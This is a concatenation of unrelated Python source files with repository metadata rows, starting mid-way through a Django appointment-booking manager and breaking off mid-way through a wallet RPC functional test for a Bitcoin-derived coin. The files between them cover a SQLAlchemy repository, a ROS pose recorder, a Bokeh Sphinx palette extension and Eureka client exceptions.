            appt.massage = None
            appt.save()
        except Exception as exception:
            return (False, [
                'There was an error cancelling the appointment.',
                exception,
            ])

        name = 'your' if user_id == client_id \
            else '%s %s\'s' % (profile.user.first_name, profile.user.last_name)
        message = 'You have successfully cancelled %s appointment.' % name
        return (True, message)

    def reschedule(self, request):
        # Context for the reschedule page: current user + the client whose
        # appointment is being moved, plus the same first-available-day
        # navigation data as index().
        from users.models import Profile
        from booking.models import Appointment

        errors = []

        user_id = int(request.session.get('id', 0))
        client_id = int(request.session.get('client-id', 0))

        if user_id == 0:
            errors.append(
                'There was an error retrieving your profile. Please sign in.')
        if client_id == 0:
            errors.append(
                'There was an error retrieving the client\'s profile.')

        user_profile = Profile.objects.get(user__pk=user_id) \
            if 'id' in request.session else None
        client_profile = Profile.objects.get(user__pk=client_id) \
            if 'client-id' in request.session else None

        today = datetime.now(tz).replace(hour=0, minute=0, second=0, microsecond=0)

        appts = Appointment.objects.filter(
            date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
            profile__isnull=True,
            black_out=False,
        ).order_by('date_start')

        # NOTE(review): unlike index(), appts[0] is not guarded by an
        # IndexError handler -- this raises when no open slots exist.
        date_begin = appts[0].date_start
        date_begin = date_begin.astimezone(tz)
        date_begin = date_begin.replace(hour=0, minute=0, second=0, microsecond=0)

        prev_appts = Appointment.objects.filter(
            date_start__lt=date_begin.astimezone(pytz.utc),
            date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
            profile__isnull=True,
            black_out=False,
        ).order_by('-date_start')

        next_appts = Appointment.objects \
            .filter(
                date_start__gte=date_begin.astimezone(pytz.utc) + timedelta(days=1),
                profile__isnull=True,
                black_out=False,
            ).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
            .order_by('date_start')

        # fall back to +/- one calendar day when no neighbouring slot exists
        try:
            prev = prev_appts[0].date_start
        except IndexError:
            prev = date_begin - timedelta(days=1)
        except Exception as exception:
            errors.append('There was an error retrieving the previous day.')
            errors.append(exception)

        try:
            next = next_appts[0].date_start
        except IndexError:
            next = date_begin + timedelta(days=1)
        except Exception as exception:
            errors.append('There was an error retrieving the next day.')
            errors.append(exception)

        if errors:
            return (False, errors)

        name = 'your' if user_id == client_id \
            else '%s %s\'s' % (
                client_profile.user.first_name,
                client_profile.user.last_name,
            )

        return (True, {
            'date': date_begin,
            'prev': prev,
            'next': next,
            'profile': user_profile,
            'client_profile': client_profile,
            'name': name,
        })

    def reschedule_form(self, request):
        # Validate that a client profile id was posted before showing the
        # reschedule form; returns (True, profile_id) or (False, errors).
        profile_id = int(request.POST.get('profile-id', 0))

        if profile_id == 0:
            return (False, ['There was an error retrieving the client\'s profile.'])

        return (True, profile_id)

    def reschedule_submit(self, request):
        # Move the client's single upcoming appointment to the posted slot,
        # carrying the massage type over and releasing the old slot.
        from users.models import Profile
        from booking.models import Appointment

        user_id = int(request.session.get('id', 0))
        client_id = int(request.session.get('client-id', 0))
        appt_id = int(request.POST.get('appointment-id', 0))

        profile = Profile.objects.get(user__pk=client_id) \
            if 'client-id' in request.session else None

        if profile == None:  # NOTE(review): idiomatic form is "is None"
            return (False, ['There was an error retrieving the client\'s profile.'])

        try:
            old_appt = Appointment.objects.get(
                profile=profile,
                date_start__gt=datetime.now(tz).astimezone(pytz.utc),
                black_out=False,
            )
        except Appointment.DoesNotExist:
            return (False, [
                'The specified user does not have an appointment. ' +
                'Please create one by clicking the \'Booking\' tab.',
            ])
        except MultipleObjectsReturned:
            return (False, [
                'The specified user has multiple appointments scheduled. ' +
                'Please cancel all appointments and create a new one.',
            ])

        try:
            new_appt = Appointment.objects.get(pk=appt_id)
        except Appointment.DoesNotExist:
            return (False, [
                'The specified appointment does not exist.',
            ])
        except MultipleObjectsReturned:
            return (False, [
                'The specified user has multiple appointments scheduled. ' +
                'Please cancel all appointments and create a new one.',
            ])

        # transfer ownership and massage selection to the new slot
        new_appt.massage = old_appt.massage
        old_appt.massage = None
        old_appt.profile = None
        new_appt.profile = profile
        old_appt.save()
        new_appt.save()

        name = 'your' if user_id == client_id \
            else '%s %s\'s' % (profile.user.first_name, profile.user.last_name)
        message = 'You have successfully rescheduled %s appointment.' % name
        return (True, message)

    def black_out_appointment(self, request):
        # Toggle the black-out flag on a single slot; returns bool success.
        from booking.models import Appointment

        try:
            id = int(request.POST.get('id'))
        except TypeError:
            # missing id: int(None) raises TypeError
            return False

        appt = Appointment.objects.get(pk=id)
        appt.black_out = not appt.black_out
        appt.save()
        return True

    def black_out_date(self, request):
        # Toggle black-out for a whole day: open slots get blacked out;
        # failing that, blacked-out slots are re-opened; if the day has no
        # unbooked slots at all, a fresh slot schedule is created.
        from booking.models import Appointment

        try:
            day = datetime(
                int(request.POST.get('year')),
                int(request.POST.get('month')),
                int(request.POST.get('day')),
                0, 0, 0, 0,
            )
        except TypeError:
            return False

        day = tz.localize(day)
        day = day.astimezone(pytz.utc)

        appts = Appointment.objects.filter(
            date_start__year=day.year,
            date_start__month=day.month,
            date_start__day=day.day,
            profile=None,
            black_out=False,
        )

        if len(appts) == 0:
            appts = Appointment.objects.filter(
                date_start__year=day.year,
                date_start__month=day.month,
                date_start__day=day.day,
                profile=None,
                black_out=True,
            )
            if len(appts) == 0:
                # no unbooked slots at all on this day: create the schedule
                valid, response = Appointment.objects.create_appointments(day)
                if not valid:
                    raise response
            else:
                for appt in appts:
                    appt.black_out = False
                    appt.save()
        else:
            for appt in appts:
                appt.black_out = True
                appt.save()

        return True

    def add_appointment(self, request):
        # Admin flow: select (or create) the client profile, then return
        # the same first-available-day booking context as index().
        from users.models import Profile
        from booking.models import Appointment

        profile_id = int(request.POST.get('active-id', 0))
        if profile_id:
            profile = Profile.objects.get(user__pk=profile_id)
        else:
            # no existing client selected: create a profile from the form
            valid, response = Profile.objects.add_profile(request)
            if not valid:
                return (False, response)
            profile = response

        today = datetime.now(tz).replace(hour=0, minute=0, second=0, microsecond=0)

        appts = Appointment.objects.filter(
            date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
            profile__isnull=True,
            black_out=False,
        ).order_by('date_start')

        try:
            date_begin = appts[0].date_start
            date_begin = date_begin.astimezone(tz)
            date_begin = date_begin.replace(hour=0, minute=0, second=0, microsecond=0)
        except IndexError:
            date_begin = today

        prev_appts = Appointment.objects.filter(
            date_start__lt=date_begin.astimezone(pytz.utc),
            date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
            profile__isnull=True,
            black_out=False,
        ).order_by('-date_start')

        next_appts = Appointment.objects \
            .filter(
                date_start__gte=date_begin.astimezone(pytz.utc) + timedelta(days=1),
                profile__isnull=True,
                black_out=False,
            ).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
            .order_by('date_start')

        errors = []

        try:
            prev = prev_appts[0].date_start
        except IndexError:
            prev = date_begin - timedelta(days=1)
        except Exception as exception:
            errors.append('There was an error retrieving the previous day.')
            errors.append(exception)

        try:
            next = next_appts[0].date_start
        except IndexError:
            next = date_begin + timedelta(days=1)
        except Exception as exception:
            errors.append('There was an error retrieving the next day.')
            errors.append(exception)

        if errors:
            return (False, errors)

        return (True, {
            'date': date_begin,
            'prev': prev,
            'next': next,
            'profile': profile,
        })
| 32.157074 | 90 | 0.5033 |
795b923d6a54cbe3ac1846a4213245ecb72e7af9 | 620 | py | Python | service/repo.py | ppmadalin/py-patterns | ea898e0119c0cd746953c955152efa779fc72f14 | [
"MIT"
] | 4 | 2020-07-22T13:39:33.000Z | 2021-07-26T19:11:35.000Z | service/repo.py | madalinpopa/py-patterns | 795322225fba80d794fda8ac16c46c1fab210db2 | [
"MIT"
] | null | null | null | service/repo.py | madalinpopa/py-patterns | 795322225fba80d794fda8ac16c46c1fab210db2 | [
"MIT"
] | 2 | 2022-02-19T11:38:55.000Z | 2022-03-26T02:12:06.000Z | # coding: utf-8
# service/repo.py
import abc
from sqlalchemy.orm import Session
from model import Blog
class AbstractRepository(abc.ABC):
@abc.abstractmethod
def add(self, blog: Blog):
raise NotImplementedError
@abc.abstractmethod
def get(self, name: str) -> Blog:
raise NotImplementedError
class SqlRepository(AbstractRepository):
def __init__(self, session: Session):
self._session = session
def add(self, blog: Blog):
self._session.add(blog)
def get(self, name: str) -> Blog:
return self._session.query(Blog).filter_by(name=name).first()
| 20 | 69 | 0.680645 |
795b924b9d25ca292ad451bb12db68e50b22e422 | 2,644 | py | Python | pose_recorder.py | MikeFlanigan/CSCI-5922_Final_Proj | 9f4b8dc87ac2db46c02ee8a9409aea7deb477021 | [
"Unlicense"
] | null | null | null | pose_recorder.py | MikeFlanigan/CSCI-5922_Final_Proj | 9f4b8dc87ac2db46c02ee8a9409aea7deb477021 | [
"Unlicense"
] | null | null | null | pose_recorder.py | MikeFlanigan/CSCI-5922_Final_Proj | 9f4b8dc87ac2db46c02ee8a9409aea7deb477021 | [
"Unlicense"
] | null | null | null |
import numpy as np
from numpy import pi
from math import sin, cos
import rospy
from sensor_msgs.msg import LaserScan
from std_msgs.msg import Float32MultiArray
import matplotlib.pyplot as plt
import tf
import time
RunningOdroid = False
numReadings = 100
lastScan = [0]*numReadings
def scan_cb( msg ):
global lastScan
""" Process the scan that comes back from the scanner """
# NOTE: Scan progresses from least theta to most theta: CCW
# print "Got a scanner message with" , len( msg.intensities ) , "readings!"
# ~ print "Scan:" , self.lastScan
# print "Scan Min:" , min( self.lastScan ) , ", Scan Max:" , max( self.lastScan )
if RunningOdroid:
lastScan = msg.data #lastScan = [ elem/25.50 for elem in msg.data ] # scale [0,255] to [0,10]
else:
lastScan = msg.intensities
rospy.init_node( 'pose_sherlock' , anonymous = True )
if RunningOdroid:
rospy.Subscriber( "/filtered_distance" , Float32MultiArray , scan_cb )
else:
rospy.Subscriber( "/scan" , LaserScan , scan_cb )
listener = tf.TransformListener()
try:
ex_count = 0
last = time.time()
while ( not rospy.is_shutdown() ):
try:
lastScanNP = np.asarray( lastScan ) # scan data
(trans,rot) = listener.lookupTransform('map', 'base_link', rospy.Time(0)) # pose
x = trans[0]
y = trans[1]
if x >= 0.25: # only record in upper section of the U
if time.time()-last > 0.1:
last = time.time()
roll,pitch,yaw = tf.transformations.euler_from_quaternion(rot)
if yaw < 0: yaw = -yaw
else: yaw = 2*np.pi - yaw
yaw += np.pi/2 # basically prevent roll over problems on this map
yaw = np.mod(yaw,2*np.pi)
ex_count += 1
# print(ex_count, ' x:',x,' y:',y,' yaw:',yaw,' scan mean:',lastScanNP.mean())
new_row = np.concatenate((np.asarray([x,y,yaw]),lastScanNP),0)
new_row = np.reshape(new_row,(1,np.shape(new_row)[0]))
try:
mini_dataset = np.concatenate((mini_dataset, new_row),0)
print(np.shape(mini_dataset))
except NameError:
mini_dataset = new_row
if np.shape(mini_dataset)[0] > 150000: break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
np.save('synth_set.npy',mini_dataset)
except KeyboardInterrupt:
pass
| 34.789474 | 102 | 0.576399 |
795b9325f12e6b7d857eca6c5bee2bfb2afae32e | 4,089 | py | Python | bokeh/sphinxext/bokeh_palette_group.py | jeisch/bokeh | 6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1 | [
"BSD-3-Clause"
] | 1 | 2020-03-21T04:11:51.000Z | 2020-03-21T04:11:51.000Z | bokeh/sphinxext/bokeh_palette_group.py | jeisch/bokeh | 6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1 | [
"BSD-3-Clause"
] | 2 | 2021-05-08T11:43:21.000Z | 2021-05-10T19:16:43.000Z | bokeh/sphinxext/bokeh_palette_group.py | jeisch/bokeh | 6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1 | [
"BSD-3-Clause"
] | null | null | null | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Generate visual representations of palettes in Bokeh palette groups.
The ``bokeh.palettes`` modules expose attributes such as ``mpl``, ``brewer``,
and ``d3`` that provide groups of palettes. The ``bokeh-palette-group``
directive accepts the name of one of these groups, and generates a visual
matrix of colors for every palette in the group.
As an example, the following usage of the the directive:
.. code-block:: rest
.. bokeh-palette-group:: mpl
Generates the output:
.. bokeh-palette-group:: mpl
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
from docutils import nodes
from docutils.parsers.rst import Directive
from sphinx.errors import SphinxError
# Bokeh imports
from .. import palettes as bp
from .templates import PALETTE_GROUP_DETAIL
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'bokeh_palette_group',
'BokehPaletteGroupDirective',
'html_visit_bokeh_palette_group',
'setup',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
class bokeh_palette_group(nodes.General, nodes.Element):
pass
class BokehPaletteGroupDirective(Directive):
has_content = False
required_arguments = 1
def run(self):
node = bokeh_palette_group()
node['group'] = self.arguments[0]
return [node]
def html_visit_bokeh_palette_group(self, node):
self.body.append(_BOOTSTRAP_CSS)
self.body.append('<div class="container-fluid"><div class="row">"')
group = getattr(bp, node['group'], None)
if not isinstance(group, dict):
raise SphinxError("invalid palette group name %r" % node['group'])
names = sorted(group)
for name in names:
palettes = group[name]
# arbitrary cuttoff here, idea is to not show large (e.g 256 length) palettes
numbers = [x for x in sorted(palettes) if x < 30]
html = PALETTE_GROUP_DETAIL.render(name=name, numbers=numbers, palettes=palettes)
self.body.append(html)
self.body.append('</div></div>')
self.body.append(_BOOTSTRAP_JS)
raise nodes.SkipNode
def setup(app):
''' Required Sphinx extension setup function. '''
app.add_node(bokeh_palette_group, html=(html_visit_bokeh_palette_group, None))
app.add_directive('bokeh-palette-group', BokehPaletteGroupDirective)
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
_BOOTSTRAP_CSS = """
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
"""
_BOOTSTRAP_JS = """
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
"""
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| 34.361345 | 100 | 0.493275 |
795b93a447dae6b1adf39061a7079ddbbe4548a5 | 703 | py | Python | dss_sm_so/tests/__init__.py | MobileCloudNetworking/dssaas | 87b6f7d60ecc397a88326a955b2ddfd3d73205d1 | [
"Apache-2.0"
] | null | null | null | dss_sm_so/tests/__init__.py | MobileCloudNetworking/dssaas | 87b6f7d60ecc397a88326a955b2ddfd3d73205d1 | [
"Apache-2.0"
] | null | null | null | dss_sm_so/tests/__init__.py | MobileCloudNetworking/dssaas | 87b6f7d60ecc397a88326a955b2ddfd3d73205d1 | [
"Apache-2.0"
] | 1 | 2018-10-09T06:28:36.000Z | 2018-10-09T06:28:36.000Z | # Copyright 2014 Zuercher Hochschule fuer Angewandte Wissenschaften
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unittests
"""
__author__ = 'andy' | 37 | 78 | 0.732575 |
795b943d2d03bb00951f5d7fa1bcfdc0c64ca5c6 | 829 | py | Python | py_eureka_client/exceptions.py | dev-89/python-eureka-client | 9927fc2766d19a79a5f192667c8755fe38e01d2c | [
"MIT"
] | null | null | null | py_eureka_client/exceptions.py | dev-89/python-eureka-client | 9927fc2766d19a79a5f192667c8755fe38e01d2c | [
"MIT"
] | null | null | null | py_eureka_client/exceptions.py | dev-89/python-eureka-client | 9927fc2766d19a79a5f192667c8755fe38e01d2c | [
"MIT"
] | null | null | null | from logging import exception
import py_eureka_client.http_client as http_client
from py_eureka_client import instance
class EurekaServerConnectionException(http_client.URLError):
pass
class DiscoverException(http_client.URLError):
pass
class WrongXMLNodeError(Exception):
"""Custom error that is raised when XML node is of wrong type"""
def __init__(self, node_type: str, message: str) -> None:
self.node_type: str = node_type
self.message: str = message
super().__init__(message)
class InstanceDoesNotExistError(Exception):
"""Custom error if an instance id is queried, which does not exist"""
def __init__(self, instance_id: str, message: str) -> None:
self.instance_id: str = instance_id
self.message: str = message
super().__init__(message)
| 26.741935 | 73 | 0.721351 |
795b95a286215dfb8c37dc5634d5889e732b2f1c | 21,985 | py | Python | qa/rpc-tests/wallet.py | lycion/lkcoinse | 9cf9ed5730217566b44466c22dc255f0134ad1bb | [
"MIT"
] | null | null | null | qa/rpc-tests/wallet.py | lycion/lkcoinse | 9cf9ed5730217566b44466c22dc255f0134ad1bb | [
"MIT"
] | null | null | null | qa/rpc-tests/wallet.py | lycion/lkcoinse | 9cf9ed5730217566b44466c22dc255f0134ad1bb | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2015 The Lkcoinse Core developers
# Copyright (c) 2015-2017 The Lkcoinse Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import test_framework.loginit
import time
import sys
if sys.version_info[0] < 3:
raise "Use Python 3"
import logging
from test_framework.test_framework import LkcoinseTestFramework
from test_framework.util import *
import binascii
from test_framework.script import *
from test_framework.nodemessages import *
def GenerateSingleSigP2SH(lcsAddress):
redeemScript = CScript([OP_DUP, OP_HASH160, lkcoinseAddress2bin(lcsAddress), OP_EQUALVERIFY, OP_CHECKSIG])
p2shAddressBin = hash160(redeemScript)
p2shAddress = encodeLkcoinseAddress(bytes([196]), p2shAddressBin) # 196 is regtest P2SH addr prefix
pubkeyScript = CScript([OP_HASH160, p2shAddressBin, OP_EQUAL])
return ( p2shAddress, redeemScript)
def waitForRescan(node):
info = node.getinfo()
while "rescanning" in info["status"]:
logging.info("rescanning")
time.sleep(.25)
info = node.getinfo()
class WalletTest (LkcoinseTestFramework):
def check_fee_amount(self, curr_balance, balance_with_fee, fee_per_byte, tx_size):
"""Return curr_balance after asserting the fee was in range"""
fee = balance_with_fee - curr_balance
target_fee = fee_per_byte * tx_size
if fee < target_fee:
raise AssertionError("Fee of %s LCS too low! (Should be %s LCS)"%(str(fee), str(target_fee)))
# allow the node's estimation to be at most 2 bytes off
if fee > fee_per_byte * (tx_size + 2):
raise AssertionError("Fee of %s LCS too high! (Should be %s LCS)"%(str(fee), str(target_fee)))
return curr_balance
def setup_chain(self,lkcoinseConfDict=None, wallets=None):
logging.info("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 4, lkcoinseConfDict, wallets)
def setup_network(self, split=False):
self.node_args = [['-usehd=0'], ['-usehd=0'], ['-usehd=0']]
self.nodes = start_nodes(3, self.options.tmpdir, self.node_args)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.is_network_split=False
self.sync_all()
def run_test (self):
# Check that there's no UTXO on none of the nodes
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
assert_equal(len(self.nodes[2].listunspent()), 0)
logging.info("Mining blocks...")
self.nodes[0].generate(1)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 50)
assert_equal(walletinfo['balance'], 0)
self.sync_all()
self.nodes[1].generate(101)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
assert_equal(self.nodes[2].getbalance(), 0)
# Check that only first and second nodes have UTXOs
assert_equal(len(self.nodes[0].listunspent()), 1)
assert_equal(len(self.nodes[1].listunspent()), 1)
assert_equal(len(self.nodes[2].listunspent()), 0)
# Send 21 LCS from 0 to 2 using sendtoaddress call.
# Second transaction will be child of first, and will require a fee
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 10)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 0)
# Have node0 mine a block, thus it will collect its own fee.
self.nodes[0].generate(1)
self.sync_all()
# Exercise locking of unspent outputs
unspent_0 = self.nodes[2].listunspent()[0]
unspent_0 = {"txid": unspent_0["txid"], "vout": unspent_0["vout"]}
self.nodes[2].lockunspent(False, [unspent_0])
assert_raises(JSONRPCException, self.nodes[2].sendtoaddress, self.nodes[2].getnewaddress(), 20)
assert_equal([unspent_0], self.nodes[2].listlockunspent())
self.nodes[2].lockunspent(True, [unspent_0])
assert_equal(len(self.nodes[2].listlockunspent()), 0)
# Have node1 generate 100 blocks (so node0 can recover the fee)
self.nodes[1].generate(100)
self.sync_all()
# node0 should end up with 100 lcs in block rewards plus fees, but
# minus the 21 plus fees sent to node2
assert_equal(self.nodes[0].getbalance(), 100-21)
assert_equal(self.nodes[2].getbalance(), 21)
# Node0 should have two unspent outputs.
# Create a couple of transactions to send them to node2, submit them through
# node1, and make sure both node0 and node2 pick them up properly:
node0utxos = self.nodes[0].listunspent(1)
assert_equal(len(node0utxos), 2)
# create both transactions
txns_to_send = []
for utxo in node0utxos:
inputs = []
outputs = {}
inputs.append({ "txid" : utxo["txid"], "vout" : utxo["vout"]})
outputs[self.nodes[2].getnewaddress("from1")] = utxo["amount"]
raw_tx = self.nodes[0].createrawtransaction(inputs, outputs)
txns_to_send.append(self.nodes[0].signrawtransaction(raw_tx))
# Have node 1 (miner) send the transactions
self.nodes[1].sendrawtransaction(txns_to_send[0]["hex"], True)
self.nodes[1].sendrawtransaction(txns_to_send[1]["hex"], True)
# Have node1 mine a block to confirm transactions:
self.nodes[1].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 100)
assert_equal(self.nodes[2].getbalance("from1"), 100-21)
# Send 10 LCS normal
address = self.nodes[0].getnewaddress("test")
fee_per_byte = Decimal('0.001') / 1000
self.nodes[2].settxfee(fee_per_byte * 1000)
txid = self.nodes[2].sendtoaddress(address, 10, "", "", False)
self.nodes[2].generate(1)
self.sync_all()
node_2_bal = self.check_fee_amount(self.nodes[2].getbalance(), Decimal('90'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), Decimal('10'))
# Send 10 LCS with subtract fee from amount
txid = self.nodes[2].sendtoaddress(address, 10, "", "", True)
self.nodes[2].generate(1)
self.sync_all()
node_2_bal -= Decimal('10')
assert_equal(self.nodes[2].getbalance(), node_2_bal)
node_0_bal = self.check_fee_amount(self.nodes[0].getbalance(), Decimal('20'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
# Sendmany 10 LCS
txid = self.nodes[2].sendmany('from1', {address: 10}, 0, "", [])
self.nodes[2].generate(1)
self.sync_all()
node_0_bal += Decimal('10')
node_2_bal = self.check_fee_amount(self.nodes[2].getbalance(), node_2_bal - Decimal('10'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), node_0_bal)
# Sendmany 10 LCS with subtract fee from amountd
txid = self.nodes[2].sendmany('from1', {address: 10}, 0, "", [address])
self.nodes[2].generate(1)
self.sync_all()
node_2_bal -= Decimal('10')
assert_equal(self.nodes[2].getbalance(), node_2_bal)
node_0_bal = self.check_fee_amount(self.nodes[0].getbalance(), node_0_bal + Decimal('10'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
# Test ResendWalletTransactions:
# Create a couple of transactions, then start up a fourth
# node (nodes[3]) and ask nodes[0] to rebroadcast.
# EXPECT: nodes[3] should have those transactions in its mempool.
txid1 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1)
txid2 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1)
sync_mempools(self.nodes)
self.nodes.append(start_node(3, self.options.tmpdir, ['-usehd=0']))
connect_nodes_bi(self.nodes, 0, 3)
sync_blocks(self.nodes)
relayed = self.nodes[0].resendwallettransactions()
assert_equal(set(relayed), {txid1, txid2})
sync_mempools(self.nodes)
assert(txid1 in self.nodes[3].getrawmempool())
# Exercise balance rpcs
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], 1)
assert_equal(self.nodes[0].getunconfirmedbalance(), 1)
#check if we can list zero value tx as available coins
#1. create rawtx
#2. hex-changed one output to 0.0
#3. sign and send
#4. check if recipient (node0) can list the zero value tx
usp = self.nodes[1].listunspent()
inputs = [{"txid":usp[0]['txid'], "vout":usp[0]['vout']}]
outputs = {self.nodes[1].getnewaddress(): 49.998, self.nodes[0].getnewaddress(): 11.11}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs).replace("c0833842", "00000000") #replace 11.11 with 0.0 (int32)
decRawTx = self.nodes[1].decoderawtransaction(rawTx)
signedRawTx = self.nodes[1].signrawtransaction(rawTx)
decRawTx = self.nodes[1].decoderawtransaction(signedRawTx['hex'])
zeroValueTxid= decRawTx['txid']
sendResp = self.nodes[1].sendrawtransaction(signedRawTx['hex'])
self.sync_all()
self.nodes[1].generate(1) #mine a block
self.sync_all()
unspentTxs = self.nodes[0].listunspent() #zero value tx must be in listunspents output
found = False
for uTx in unspentTxs:
if uTx['txid'] == zeroValueTxid:
found = True
assert_equal(uTx['amount'], Decimal('0'))
assert_equal(uTx['satoshi'], Decimal('0'))
assert(found)
#do some -walletbroadcast tests
stop_nodes(self.nodes)
wait_lkcoinseds()
self.nodes = start_nodes(3, self.options.tmpdir, [["-walletbroadcast=0", "-usehd=0"],["-walletbroadcast=0", "-usehd=0"],["-walletbroadcast=0", "-usehd=0"]])
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.sync_all()
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 2)
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
self.nodes[1].generate(1) #mine a block, tx should not be in there
self.sync_all()
assert_equal(self.nodes[2].getbalance(), node_2_bal) #should not be changed because tx was not broadcasted
#now broadcast from another node, mine a block, sync, and check the balance
self.nodes[1].sendrawtransaction(txObjNotBroadcasted['hex'])
self.nodes[1].generate(1)
self.sync_all()
node_2_bal += 2
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
assert_equal(self.nodes[2].getbalance(), node_2_bal)
#create another tx
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 2)
#restart the nodes with -walletbroadcast=1
stop_nodes(self.nodes)
wait_lkcoinseds()
self.node_args = [['-usehd=0'], ['-usehd=0'], ['-usehd=0']]
self.nodes = start_nodes(3, self.options.tmpdir, self.node_args)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
sync_blocks(self.nodes)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
node_2_bal += 2
#tx should be added to balance because after restarting the nodes tx should be broadcastet
assert_equal(self.nodes[2].getbalance(), node_2_bal)
#send a tx with value in a string (PR#6380 +)
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "2")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-2'))
assert_equal(txObj['satoshi'], Decimal('-200000000'));
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "0.0001")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-0.0001'))
assert_equal(txObj['satoshi'], Decimal('-10000'))
#check if JSON parser can handle scientific notation in strings
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "1e-4")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-0.0001'))
try:
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "1f-4")
except JSONRPCException as e:
assert("Invalid amount" in e.error['message'])
else:
raise AssertionError("Must not parse invalid amounts")
try:
self.nodes[0].generate("2")
raise AssertionError("Must not accept strings as numeric")
except JSONRPCException as e:
assert("not an integer" in e.error['message'])
# Import address and private key to check correct behavior of spendable unspents
# 1. Send some coins to generate new UTXO
address_to_import = self.nodes[2].getnewaddress()
txid = self.nodes[0].sendtoaddress(address_to_import, 1)
self.nodes[0].generate(1)
self.sync_all()
# 2. Import address from node2 to node1
self.nodes[1].importaddress(address_to_import)
# 3. Validate that the imported address is watch-only on node1
assert(self.nodes[1].validateaddress(address_to_import)["iswatchonly"])
# 4. Check that the unspents after import are not spendable
assert_array_result(self.nodes[1].listunspent(),
{"address": address_to_import},
{"spendable": False})
# 5. Import private key of the previously imported address on node1
priv_key = self.nodes[2].dumpprivkey(address_to_import)
self.nodes[1].importprivkey(priv_key)
# 6. Check that the unspents are now spendable on node1
assert_array_result(self.nodes[1].listunspent(),
{"address": address_to_import},
{"spendable": True})
# Mine a block from node0 to an address from node1
cbAddr = self.nodes[1].getnewaddress()
blkHash = self.nodes[0].generatetoaddress(1, cbAddr)[0]
cbTxId = self.nodes[0].getblock(blkHash)['tx'][0]
self.sync_all()
# Check that the txid and balance is found by node1
try:
self.nodes[1].gettransaction(cbTxId)
except JSONRPCException as e:
